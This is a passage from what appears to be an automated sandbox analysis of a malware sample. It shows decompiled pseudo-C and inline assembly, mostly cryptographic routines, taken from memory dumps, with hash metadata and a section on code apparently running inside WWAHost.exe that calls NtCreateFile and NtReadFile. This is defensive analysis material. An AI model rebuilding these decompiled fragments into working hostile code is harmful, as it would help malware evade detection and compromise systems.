						 *0xc055ac02 = _t24;
						_t50 = _t50 - 1;
						 *0x7ac5259f = _t46;
						 *0x4ce9109d = _t28;
					} while ( &_a568098435 != 0);
					asm("sbb [0x60b3d97b], ebp");
					 *0x4d361209 =  *0x4d361209 - _t66;
					asm("ror dword [0x9fc19df4], 0x2f");
					 *0xa3418886 =  *0xa3418886 + _t39;
					 *0x9404228a =  *0x9404228a >> 0x9f;
					asm("sbb ch, [0xabdccbd7]");
					asm("cmpsw");
					_t47 = _t46 ^  *0x32907ca3;
					_t50 =  *0xd769c460 * 0x2d48;
				} while (_t50 != 0);
				asm("stosb");
				 *0xcc92142e =  *0xcc92142e ^ (_t47 |  *0x2815fe7a) -  *0x4dc106cc;
				 *0x1f5ed621 =  *0x1f5ed621 | _t28 - 0x00000001;
				asm("sbb edi, [0x854e9aed]");
				asm("sbb eax, 0xed278c8");
				return _t25;
			}

0x0041cbb7
0x0041cbb7
0x0041cbb7
0x0041cbb7
0x0041cbb8
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbba
0x0041cbbd
0x0041cbc3
0x0041cbc3
0x0041cbcb
0x0041cbd7
0x0041cbde
0x0041cbe4
0x0041cbe5
0x0041cbec
0x0041cbec
0x0041cbfa
0x0041cc01
0x0041cc08
0x0041cc0e
0x0041cc17
0x0041cc1d
0x0041cc24
0x0041cc2b
0x0041cc31
0x0041cc31
0x0041cc36
0x0041cc3d
0x0041cc43
0x0041cc4d
0x0041cc53
0x0041cc59
0x0041cc59
0x0041cc60
0x0041cc66
0x0041cc6c
0x0041cc72
0x0041cc79
0x0041cc7f
0x0041cc86
0x0041cc8c
0x0041cc99
0x0041cc9f
0x0041cc9f
0x0041ccac
0x0041ccac
0x0041ccbc
0x0041ccbc
0x0041ccd5
0x0041ccd6
0x0041ccdc
0x0041cce2
0x0041cce9
0x0041ccf0
0x0041ccf7
0x0041ccfe
0x0041cd04
0x0041cd0a
0x0041cd10
0x0041cd12
0x0041cd18
0x0041cd25
0x0041cd28
0x0041cd2e
0x0041cd2e
0x0041cd35
0x0041cd42
0x0041cd4e
0x0041cd54
0x0041cd57
0x0041cd5f
0x0041cd60
0x0041cd61
0x0041cd67
0x0041cd6d
0x0041cd73
0x0041cd74
0x0041cd7a
0x0041cd7b
0x0041cd88
0x0041cd8e
0x0041cd91
0x0041cd98
0x0041cda7
0x0041cdb4
0x0041cdba
0x0041cdbb
0x0041cdcd
0x0041cdd3
0x0041cdda
0x0041cddb
0x0041cde1
0x0041cde8
0x0041cdf4
0x0041cdff
0x0041ce05
0x0041ce11
0x0041ce1d
0x0041ce23
0x0041ce29
0x0041ce2f
0x0041ce35
0x0041ce3b
0x0041ce3b
0x0041ce48
0x0041ce4e
0x0041ce54
0x0041ce66
0x0041ce72
0x0041ce78
0x0041ce8b
0x0041ce8b
0x0041ce94
0x0041ce9a
0x0041cea0
0x0041cea7
0x0041cead
0x0041cead
0x0041cead
0x0041ceb3
0x0041ceb4
0x0041cec0
0x0041cec0
0x0041cecc
0x0041ced2
0x0041ced8
0x0041cedf
0x0041cee5
0x0041ceec
0x0041cef2
0x0041cef4
0x0041cefa
0x0041cefa
0x0041cf10
0x0041cf18
0x0041cf1e
0x0041cf24
0x0041cf2a
0x0041cf35

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67df264f7979780192fd826e801e6b6058ac20e6d9a831e1b9e2559134c46816
Instruction ID: 7800550da9ee13fca7583580b7bc54ff40d58ff9045041529b054c3906ff6dcb
Opcode Fuzzy Hash: 67df264f7979780192fd826e801e6b6058ac20e6d9a831e1b9e2559134c46816
Instruction Fuzzy Hash: A0812E32908795CFDB25DF39D98A6823FB1F712320708038ED9A2972E2D3742651CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00402D88, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E00402D88(void* __eax, void* __fp0, char _a1, intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t69;
				signed int* _t74;
				signed int* _t87;
				signed int _t100;
				signed int _t102;
				signed int _t112;
				signed int _t114;
				signed int* _t116;
				signed int _t133;
				signed int _t135;
				signed int _t139;
				signed int _t160;
				intOrPtr _t182;

				asm("sti");
				st2 = __fp0;
				asm("jecxz 0xfffffff7");
				_push( &_a1);
				_t87 = _a12;
				_t116 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t116 =  *_t87 & 0xff00ff00 |  *_t87 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[1] = _t87[1] & 0xff00ff00 | _t87[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[2] = _t87[2] & 0xff00ff00 | _t87[2] & 0x00ff00ff;
				_t69 =  &(_t116[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[3] = _t87[3] & 0xff00ff00 | _t87[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[4] = _t87[4] & 0xff00ff00 | _t87[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[5] = _t87[5] & 0xff00ff00 | _t87[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[6] = _t87[6] & 0xff00ff00 | _t87[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t116[7] = _t87[7] & 0xff00ff00 | _t87[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L5:
					return _t69 | 0xffffffff;
				} else {
					_t182 = _a4;
					_t74 = 0;
					_a12 = 0;
					while(1) {
						_t160 =  *(_t69 + 0x18);
						_t100 = ( *(_t182 + 4 + (_t160 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t182 +  &(_t74[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t182 + 4 + (_t160 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t182 + 5 + (_t160 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t182 + 4 + (_t160 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t69 - 4);
						_t133 =  *_t69 ^ _t100;
						 *(_t69 + 0x1c) = _t100;
						_t102 =  *(_t69 + 4) ^ _t133;
						 *(_t69 + 0x20) = _t133;
						_t135 =  *(_t69 + 8) ^ _t102;
						 *(_t69 + 0x24) = _t102;
						 *(_t69 + 0x28) = _t135;
						if(_t74 == 6) {
							break;
						}
						_t112 = ( *(_t182 + 4 + (_t135 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t182 + 4 + (_t135 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t182 + 4 + (_t135 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t182 + 5 + (_t135 & 0x000000ff) * 4) & 0x000000ff ^  *(_t69 + 0xc);
						_t139 =  *(_t69 + 0x10) ^ _t112;
						 *(_t69 + 0x2c) = _t112;
						_t114 =  *(_t69 + 0x14) ^ _t139;
						 *(_t69 + 0x34) = _t114;
						_t74 =  &(_a12[0]);
						 *(_t69 + 0x30) = _t139;
						 *(_t69 + 0x38) = _t114 ^ _t160;
						_t69 = _t69 + 0x20;
						_a12 = _t74;
						if(_t74 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}

0x00402d89
0x00402d8a
0x00402d8c
0x00402d90
0x00402d93
0x00402d98
0x00402da0
0x00402da9
0x00402db3
0x00402dba
0x00402dc3
0x00402dce
0x00402dd6
0x00402ddf
0x00402dea
0x00402df0
0x00402df5
0x00402dfe
0x00402e09
0x00402e11
0x00402e1a
0x00402e25
0x00402e2d
0x00402e36
0x00402e41
0x00402e49
0x00402e52
0x00402e5d
0x00402e65
0x00402e6e
0x00402e80
0x00402e83
0x00402f9d
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402ef6
0x00402efb
0x00402efd
0x00402f03
0x00402f05
0x00402f0b
0x00402f0d
0x00402f10
0x00402f16
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f80
0x00402f82
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fae
0x00402fae
0x00000000

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2faa19231e2c38caebe3a2bc6dfb2c4f9cf702aa096bef94c4978f262a690b4b
Instruction ID: 4d921ea35bc20bcbc7f7d4b5de06bb8fbd60de56e96692149d8771ff6ae7cf3b
Opcode Fuzzy Hash: 2faa19231e2c38caebe3a2bc6dfb2c4f9cf702aa096bef94c4978f262a690b4b
Instruction Fuzzy Hash: AE5183B3E14A214BD3188E05CD40632B692EFC8312B5F81BEDD199B397CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 00402D90, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}

0x00402d93
0x00402d98
0x00402da0
0x00402da9
0x00402db3
0x00402dba
0x00402dc3
0x00402dce
0x00402dd6
0x00402ddf
0x00402dea
0x00402df0
0x00402df5
0x00402dfe
0x00402e09
0x00402e11
0x00402e1a
0x00402e25
0x00402e2d
0x00402e36
0x00402e41
0x00402e49
0x00402e52
0x00402e5d
0x00402e65
0x00402e6e
0x00402e80
0x00402e83
0x00402f9f
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402ef6
0x00402efb
0x00402efd
0x00402f03
0x00402f05
0x00402f0b
0x00402f0d
0x00402f10
0x00402f16
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f80
0x00402f82
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fae
0x00402fae
0x00000000

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 004012FB, Relevance: .2, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E004012FB(void* __edx, void* __eflags, unsigned int _a4, unsigned int _a8, unsigned int _a12, unsigned int _a16, unsigned int _a20) {
				unsigned int _v8;
				signed int _v9;
				signed int _v10;
				signed int _v11;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v40;
				unsigned int __ebx;
				unsigned int __edi;
				unsigned int __esi;
				signed int _t66;
				void* _t68;
				void* _t72;
				void* _t75;
				void* _t76;
				void* _t77;
				signed int* _t88;
				void* _t91;
				void* _t92;
				void* _t94;

				asm("int1");
				_t94 = _t91;
				_pop(_t92);
				_push(es);
				if(__eflags < 0) {
					if(_t66 > _t76) {
						_t75 = _t72 - _t76 + __edx;
						if(_t75 > 0) {
							E00419CF0( &_v24, _t76, _t75);
							_t94 = _t94 + 0xc;
						}
						_t68 = 0x10 - _t75;
						_t77 = _t92 + _t75 - 0x18;
						if(0x10 != 0) {
							E00419D20(_t77, 0, _t68);
							_t94 = _t94 + 0xc;
						}
						 *_t88 =  *_t88 ^ _v24;
						_t88[1] = _t88[1] ^ _v20;
						_t88[2] = _t88[2] ^ _v16;
						_t88[3] = _t88[3] ^ _v12;
						E00401180(_a8,  &_v24, _t88);
						_t66 = _v20;
						 *_t88 = _v24;
						_t88[1] = _t66;
						_t88[2] = _v16;
						_t88[3] = _v12;
					}
					return _t66;
				} else {
					_push(__ebp);
					__ebp = __esp;
					__eax = _a16;
					__ecx = _a12;
					__esp = __esp - 0x24;
					_push(__ebx);
					__ebx = _a20;
					_push(__edi);
					__edi = __ecx;
					__eflags = __eax;
					if(__eax != 0) {
						_push(__esi);
						__esi =  *__edx;
						_v24 =  *__edx;
						__esi =  *(__edx + 4);
						_v20 =  *(__edx + 4);
						__esi =  *(__edx + 8);
						__edx =  *(__edx + 0xc);
						__eax = __eax >> 4;
						_v16 = __esi;
						_v12 = __edx;
						__eflags = __eax;
						if(__eax != 0) {
							__edx = __ebx;
							__ecx = __ecx - __edx;
							__esi = __edx + 0xc;
							_v8 = __ecx;
							_a20 = __eax;
							do {
								__ecx = _a8;
								__edx = _a4;
								 &_v24 = E00403610(_a4, _a8,  &_v24, __ebx);
								__eax =  *__edi;
								 *__ebx =  *__ebx ^  *__edi;
								__ecx =  *(__edi + 4);
								 *(__esi - 8) =  *(__esi - 8) ^  *(__edi + 4);
								__edx =  *(__edi + 8);
								 *(__esi - 4) =  *(__esi - 4) ^  *(__edi + 8);
								__eax = _v8;
								__ecx =  *(__eax + __esi);
								 *__esi =  *__esi ^  *(__eax + __esi);
								__eax = _v12 & 0x000000ff;
								__edx = _v11 & 0x000000ff;
								__ecx = _v10 & 0x000000ff;
								(_v12 & 0x000000ff) << 8 = (_v12 & 0x000000ff) << 0x00000008 | _v11 & 0x000000ff;
								__edx = _v9 & 0x000000ff;
								((_v12 & 0x000000ff) << 0x00000008 | _v11 & 0x000000ff) << 8 = ((_v12 & 0x000000ff) << 0x00000008 | _v11 & 0x000000ff) << 0x00000008 | _v10 & 0x000000ff;
								(((_v12 & 0x000000ff) << 0x00000008 | _v11 & 0x000000ff) << 0x00000008 | _v10 & 0x000000ff) << 8 = (((_v12 & 0x000000ff) << 0x00000008 | _v11 & 0x000000ff) << 0x00000008 | _v10 & 0x000000ff) << 0x00000008 | _v9 & 0x000000ff;
								__eax = ((((_v12 & 0x000000ff) << 0x00000008 | _v11 & 0x000000ff) << 0x00000008 | _v10 & 0x000000ff) << 0x00000008 | _v9 & 0x000000ff) + 1;
								__eax = __eax >> 0x18;
								_v12 = __cl;
								__edx = __eax;
								__ecx = __eax;
								__edx = __eax >> 0x10;
								__ecx = __eax >> 8;
								__edi = __edi + 0x10;
								__ebx = __ebx + 0x10;
								__esi = __esi + 0x10;
								_t52 =  &_a20;
								 *_t52 = _a20 - 1;
								__eflags =  *_t52;
								_v11 = __dl;
								_v10 = __cl;
								_v9 = __al;
							} while ( *_t52 != 0);
							__ecx = _a12;
						}
						__ecx = __ecx - __edi;
						__ecx = __ecx + _a16;
						__eflags = __ecx;
						__esi = __ecx;
						if(__ecx != 0) {
							__ecx = _a8;
							 &_v40 = _a4;
							 &_v24 = E00403610(_a4, _a8,  &_v24,  &_v40);
							__eax = 0;
							__eflags = __esi;
							if(__esi != 0) {
								__ebx = __ebx - __edi;
								__eflags = __ebx;
								do {
									__cl =  *(__ebp + __eax - 0x24);
									__cl =  *(__ebp + __eax - 0x24) ^  *__edi;
									__eax = __eax + 1;
									 *(__ebx + __edi) = __cl;
									__edi = __edi + 1;
									__eflags = __eax - __esi;
								} while (__eax < __esi);
							}
						}
						_pop(__esi);
					}
					_pop(__edi);
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
			}

0x004012fb
0x004012fc
0x004012fc
0x004012fd
0x004012fe
0x00401287
0x0040128b
0x0040128f
0x00401297
0x0040129c
0x0040129c
0x004012a4
0x004012a6
0x004012aa
0x004012b0
0x004012b5
0x004012b5
0x004012bb
0x004012c0
0x004012c9
0x004012cc
0x004012d6
0x004012de
0x004012e4
0x004012e9
0x004012ec
0x004012f2
0x004012f2
0x004012fa
0x00401300
0x00401300
0x00401301
0x00401303
0x00401306
0x00401309
0x0040130c
0x0040130d
0x00401310
0x00401311
0x00401313
0x00401315
0x0040131b
0x0040131c
0x0040131e
0x00401321
0x00401324
0x00401327
0x0040132a
0x0040132d
0x00401330
0x00401333
0x00401336
0x00401338
0x0040133e
0x00401340
0x00401342
0x00401345
0x00401348
0x00401350
0x00401350
0x00401353
0x0040135d
0x00401362
0x00401364
0x00401366
0x00401369
0x0040136c
0x0040136f
0x00401372
0x00401375
0x00401378
0x0040137a
0x0040137e
0x00401382
0x00401389
0x0040138b
0x00401392
0x00401397
0x00401399
0x0040139c
0x0040139f
0x004013a2
0x004013a4
0x004013a6
0x004013a9
0x004013af
0x004013b2
0x004013b5
0x004013b8
0x004013b8
0x004013b8
0x004013bb
0x004013be
0x004013c1
0x004013c1
0x004013c6
0x004013c6
0x004013c9
0x004013cb
0x004013cb
0x004013ce
0x004013d0
0x004013d2
0x004013d9
0x004013e2
0x004013ea
0x004013ec
0x004013ee
0x004013f0
0x004013f0
0x004013f2
0x004013f2
0x004013f6
0x004013f8
0x004013f9
0x004013fc
0x004013fd
0x004013fd
0x004013f2
0x004013ee
0x00401401
0x00401401
0x00401402
0x00401403
0x00401404
0x00401406
0x00401407
0x00401407

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d1111c4ac953f104d237865f325080970ca3a9c5474413823797f915cbf3038
Instruction ID: ff77a05a1b27ebcdce520a4503bb0c4a62ef259eb4b077c509ea0fe1ed122904
Opcode Fuzzy Hash: 2d1111c4ac953f104d237865f325080970ca3a9c5474413823797f915cbf3038
Instruction Fuzzy Hash: A1517571A0011A9BDB08CF69D8918AFFBB5EF98300B14867EE855E7351D634EA51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401030, Relevance: .1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}

0x00401030
0x0040105b
0x0040105d
0x00401063
0x00401065
0x00401065
0x00401071
0x00401076
0x0040107c
0x004010ac
0x004010ae
0x004010b4
0x004010ba
0x004010bc
0x004010bc
0x004010cb
0x004010d0
0x004010d6
0x00401101
0x00401103
0x00401109
0x0040110f
0x00401111
0x00401111
0x00401120
0x00401128
0x0040112b
0x0040114f
0x00401156
0x0040115d
0x00401169
0x0040116c
0x0040116f
0x00401173

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5

Uniqueness

Uniqueness Score: -1.00%

Function 004162C4, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004162C4(void* __eax, void* __edx, void* __fp0) {

				return __eax;
			}

0x004162d9

Memory Dump Source

Source File: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aac1f3555734833217512cfe012e38eac2f53a371f6d1d2c8e8c4b79d2bedbbe
Instruction ID: b48260bef513796f463bc0e3efe68a31210d35b2119a690019590eb0a6053da8
Opcode Fuzzy Hash: aac1f3555734833217512cfe012e38eac2f53a371f6d1d2c8e8c4b79d2bedbbe
Instruction Fuzzy Hash: 1EB09217BCC1198145105E4EF800074F331F2CB037A1432A2C90CB34001922D41602AC

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WWAHost.exe PID: 1380 Parent PID: 3388 WWAHost.exeCOMMON

Executed Functions

Function 0289817B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02893B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02893B97,007A002E,00000000,00000060,00000000,00000000), ref: 0289820D

Strings

.z`, xrefs: 028981FD, 02898208

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 082f6ee7ca5258f77a81ac785f4767363396ef96bad12c5abc042c70d8a182c0
Instruction ID: 333642f254530d4c93453f300863fd9cbe1a61f3e3d2517dccf1a4a707d08f4d
Opcode Fuzzy Hash: 082f6ee7ca5258f77a81ac785f4767363396ef96bad12c5abc042c70d8a182c0
Instruction Fuzzy Hash: 16119BB6604209AFCB08DF9CDC85DEB77AAAF8C754F158648FA19D7241D630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 028981BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02893B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02893B97,007A002E,00000000,00000060,00000000,00000000), ref: 0289820D

Strings

.z`, xrefs: 028981FD, 02898208

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: de01d3b9086a1138c0c11baca72b48ad396819f83b4c9a591dea0ac5c1c50103
Instruction ID: 54f705b61c1a0568320c8311e44c730d35b44faa0b048c13a0aac3b791880722
Opcode Fuzzy Hash: de01d3b9086a1138c0c11baca72b48ad396819f83b4c9a591dea0ac5c1c50103
Instruction Fuzzy Hash: 0901B2B6215108AFCB08CF98DC85EEB77A9AF8C754F158248FA1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 028981C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02893B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02893B97,007A002E,00000000,00000060,00000000,00000000), ref: 0289820D

Strings

.z`, xrefs: 028981FD, 02898208

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: f39c148db71263fd2b83632d190e1ad83679f91406d1c2951f5a7aad4728deed
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 54F0B2B6200208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0289826B, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02893D52,5E972F59,FFFFFFFF,02893A11,?,?,02893D52,?,02893A11,FFFFFFFF,5E972F59,02893D52,?,00000000), ref: 028982B5

Memory Dump Source

Source File: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false

Yara matches

Similarity

